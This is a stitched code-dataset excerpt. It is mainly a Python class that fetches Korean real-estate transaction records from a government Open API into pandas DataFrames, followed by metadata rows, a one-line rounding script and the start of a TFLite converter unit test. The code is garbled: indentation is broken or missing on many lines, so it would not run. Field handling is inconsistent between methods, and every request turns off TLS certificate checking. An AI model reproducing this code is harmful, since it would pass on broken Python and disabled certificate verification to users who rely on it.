                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def AptTradeDetail(self, LAWD_CD, DEAL_YMD):
'''
        02 Detailed apartment sale transaction records
        Input: region code (first 5 digits of the legal-dong code), contract month (YYYYmm)
'''
# URL
url_1 = self.urlAptTradeDetail + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['거래금액','건축년도','년','도로명','도로명건물본번호코드',
'도로명건물부번호코드','도로명시군구코드','도로명일련번호코드',
'도로명지상지하코드','도로명코드','법정동','법정동본번코드',
'법정동부번코드','법정동시군구코드','법정동읍면동코드',
'법정동지번코드','아파트','월','일','전용면적','지번',
'지역코드','층']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[거래금액,건축년도,년,도로명,도로명건물본번호코드,도로명건물부번호코드,도로명시군구코드,도로명일련번호코드,
도로명지상지하코드,도로명코드,법정동,법정동본번코드,법정동부번코드,법정동시군구코드,법정동읍면동코드,
법정동지번코드,아파트,월,일,전용면적,지번,지역코드,층]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = [
'지역코드','법정동','거래일','아파트','지번','전용면적','층','건축년도','거래금액',
'법정동본번코드','법정동부번코드','법정동시군구코드','법정동읍면동코드','법정동지번코드',
'도로명','도로명건물본번호코드','도로명건물부번호코드','도로명시군구코드','도로명일련번호코드',
'도로명지상지하코드','도로명코드'
]
# Feature Engineering
            if len(df) > 0:
                df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
                df['거래일'] = pd.to_datetime(df['거래일'])
                df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',', ''))
            else:
                df = pd.DataFrame(columns=colNames)
                print("No records found for this query.")
            # Arrange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df['아파트'] = df['아파트'].str.strip()
df.index = range(len(df))
            # Numeric conversion
cols = df.columns.drop(['법정동','거래일','아파트','지번','도로명'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so reaching
            # this branch indicates an error in the Python logic above
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API provider returned an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def AptRent(self, LAWD_CD, DEAL_YMD):
'''
        03 Apartment jeonse / monthly-rent records
        Input: region code (first 5 digits of the legal-dong code), contract month (YYYYmm)
'''
# URL
url_1 = self.urlAptRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','아파트','지번','년','월','일','건축년도','전용면적','층','보증금액','월세금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,아파트,지번,년,월,일,건축년도,전용면적,층,보증금액,월세금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','아파트','지번','전용면적','층','건축년도','보증금액','월세금액']
# Feature Engineering
            if len(df) > 0:
                df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
                df['거래일'] = pd.to_datetime(df['거래일'])
                df['보증금액'] = pd.to_numeric(df['보증금액'].str.replace(',', ''))
                df['월세금액'] = pd.to_numeric(df['월세금액'].str.replace(',', ''))
            else:
                df = pd.DataFrame(columns=colNames)
                print("No records found for this query.")
            # Arrange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','지번','아파트'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def AptOwnership(self, LAWD_CD, DEAL_YMD):
        '''
        04 Apartment pre-sale right (bunyang-gwon) resale report records lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlAptOwnership + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','단지','지번','구분','년','월','일','전용면적','층','거래금액']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','단지','지번','구분','전용면적','층','거래금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','시군구','단지','지번','구분'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def OffiTrade(self, LAWD_CD, DEAL_YMD):
        '''
        05 Officetel sale report lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlOffiTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','단지','지번','년','월','일','전용면적','층','거래금액']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','단지','지번','전용면적','층','거래금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','시군구','단지','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def OffiRent(self, LAWD_CD, DEAL_YMD):
        '''
        06 Officetel jeonse / monthly-rent report lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlOffiRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','단지','지번','년','월','일','전용면적','층','보증금','월세']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','단지','지번','전용면적','층','보증금','월세']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['보증금'] = pd.to_numeric(df['보증금'].str.replace(',',''))
df['월세'] = pd.to_numeric(df['월세'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','시군구','단지','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def RHTrade(self, LAWD_CD, DEAL_YMD):
        '''
        07 Row house / multiplex housing (yeollip-dasedae) sale actual-transaction records lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlRHTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','연립다세대','지번','년','월','일','전용면적','건축년도','층','거래금액']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','연립다세대','지번','전용면적','건축년도','층','거래금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','연립다세대','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def RHRent(self, LAWD_CD, DEAL_YMD):
        '''
        08 Row house / multiplex housing (yeollip-dasedae) jeonse / monthly-rent actual-transaction records lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlRHRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','연립다세대','지번','년','월','일','전용면적','건축년도','층','보증금액','월세금액']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','연립다세대','지번','전용면적','건축년도','층','보증금액','월세금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['보증금액'] = pd.to_numeric(df['보증금액'].str.replace(',',''))
df['월세금액'] = pd.to_numeric(df['월세금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','연립다세대','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def DHTrade(self, LAWD_CD, DEAL_YMD):
        '''
        09 Detached / multi-household housing (dandok-dagagu) sale actual-transaction lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlDHTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','주택유형','년','월','일','대지면적','연면적','건축년도','거래금액']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','주택유형','대지면적','연면적','건축년도','거래금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','주택유형'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def DHRent(self, LAWD_CD, DEAL_YMD):
        '''
        10 Detached / multi-household housing (dandok-dagagu) jeonse / monthly-rent records lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlDHRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','년','월','일','계약면적','보증금액','월세금액']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','계약면적','보증금액','월세금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['보증금액'] = pd.to_numeric(df['보증금액'].str.replace(',',''))
df['월세금액'] = pd.to_numeric(df['월세금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def LandTrade(self, LAWD_CD, DEAL_YMD):
        '''
        11 Land sale report lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlLandTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','용도지역','지목','년','월','일','지분거래구분','거래면적','거래금액']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','용도지역','지목','지분거래구분','거래면적','거래금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','시군구','용도지역','지목','지분거래구분'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
def BizTrade(self, LAWD_CD, DEAL_YMD):
        '''
        12 Commercial / business-use real estate sale report records lookup
        Inputs: region code (first 5 digits of the beopjeong-dong code), contract month (YYYYmm)
        '''
# URL
url_1 = self.urlBizTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['거래금액','건물면적','건물주용도','건축년도','구분','년','월','일','대지면적','법정동','시군구','용도지역','유형','지역코드','층']
            for t in te:
                # Collect the fields of one <item> into a dict rather than
                # writing them into module-level globals()
                row = {}
                for variable in variables:
                    try:
                        row[variable] = t.find(variable).text
                    except Exception:
                        row[variable] = np.nan
                data = pd.DataFrame([row], columns=variables)
                df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','용도지역','유형','대지면적','구분','건물면적','건물주용도','건축년도','층','거래금액']
# Feature Engineering
try:
                if len(df['년']) != 0 and len(df['월']) != 0 and len(df['일']) != 0:
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
            # Convert the remaining columns to numeric
cols = df.columns.drop(['법정동','거래일','시군구','용도지역','유형','건물주용도'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so the
            # exception above must come from the Python code
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API service provider reported an error
            else:
                print(">>> Open API Error: {}".format(te[0].find('resultMsg').text))
pass
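    # --- Refactoring sketch (added; not part of the original source) ---
    # The twelve query methods above share the same fetch/parse skeleton. A
    # hedged sketch of a shared helper each of them could delegate to;
    # `_fetch_items` is a hypothetical name, not part of the original API:
    #
    #   def _fetch_items(self, baseUrl, LAWD_CD, DEAL_YMD):
    #       url = (baseUrl + '&LAWD_CD=' + str(LAWD_CD)
    #              + '&DEAL_YMD=' + str(DEAL_YMD) + '&numOfRows=99999')
    #       result = requests.get(url, verify=False)
    #       xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
    #       return xmlsoup.findAll("item")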
| 35.889273 | 219 | 0.440417 | 4,360 | 41,488 | 4.134633 | 0.081881 | 0.013591 | 0.017085 | 0.027736 | 0.834914 | 0.809064 | 0.801853 | 0.798857 | 0.796416 | 0.794586 | 0 | 0.014029 | 0.414144 | 41,488 | 1,155 | 220 | 35.920346 | 0.727639 | 0.092557 | 0 | 0.756923 | 0 | 0.02 | 0.154595 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023077 | false | 0.018462 | 0.007692 | 0 | 0.053846 | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ebf9795d24d63445e064b81ec744c1b3f54413a3 | 35 | py | Python | tools/demoRound.py | nguyenquanghieu2000d/PlateDetectApp | 3145394fb12fbe831a3f94f33b3278b705da86c0 | [
"Apache-2.0"
] | 2 | 2021-06-25T17:48:15.000Z | 2021-06-25T17:55:49.000Z | tools/demoRound.py | nguyenquanghieu2000d/PlateDetectApp | 3145394fb12fbe831a3f94f33b3278b705da86c0 | [
"Apache-2.0"
] | null | null | null | tools/demoRound.py | nguyenquanghieu2000d/PlateDetectApp | 3145394fb12fbe831a3f94f33b3278b705da86c0 | [
"Apache-2.0"
] | null | null | null | print(round(1231234.2345345345, 2)) | 35 | 35 | 0.8 | 5 | 35 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.529412 | 0.028571 | 35 | 1 | 35 | 35 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
88ec8f64911e3b18f1b6c9586a034ad50abd3756 | 20,862 | py | Python | tests/converter_unit_test.py | steven9046/TinyNeuralNetwork | 98789fe2ea8da95f4ad16609541a00ff16e34e5e | [
"MIT"
] | 1 | 2022-01-11T06:40:13.000Z | 2022-01-11T06:40:13.000Z | tests/converter_unit_test.py | steven9046/TinyNeuralNetwork | 98789fe2ea8da95f4ad16609541a00ff16e34e5e | [
"MIT"
] | null | null | null | tests/converter_unit_test.py | steven9046/TinyNeuralNetwork | 98789fe2ea8da95f4ad16609541a00ff16e34e5e | [
"MIT"
] | null | null | null | import unittest
import tflite
import torch
import torch.nn as nn
import torch.nn.functional as F
from tinynn.converter import TFLiteConverter
def parse_model(path):
with open(path, 'rb') as f:
buf = f.read()
model = tflite.Model.GetRootAsModel(buf, 0)
return model
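# A short illustration (added; not part of the original source): parse_model
# loads the flatbuffer written by TFLiteConverter so that the tests can assert
# on the graph structure, e.g.
#
#   m = parse_model('out/converter_test_0.tflite')
#   m.SubgraphsLength()                  # number of subgraphs
#   m.Subgraphs(0).OperatorsLength()     # number of operators in the main graph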
def get_model_path():
size = getattr(get_model_path, 'size', 0)
model_path = f'out/converter_test_{size}.tflite'
setattr(get_model_path, 'size', size + 1)
return model_path
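# Note (added; not part of the original source): get_model_path() keeps a
# counter on the function object itself, so successive calls yield distinct
# paths: 'out/converter_test_0.tflite', 'out/converter_test_1.tflite', etc.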
class ConverterOptimizerTester(unittest.TestCase):
def test_tuple_output(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
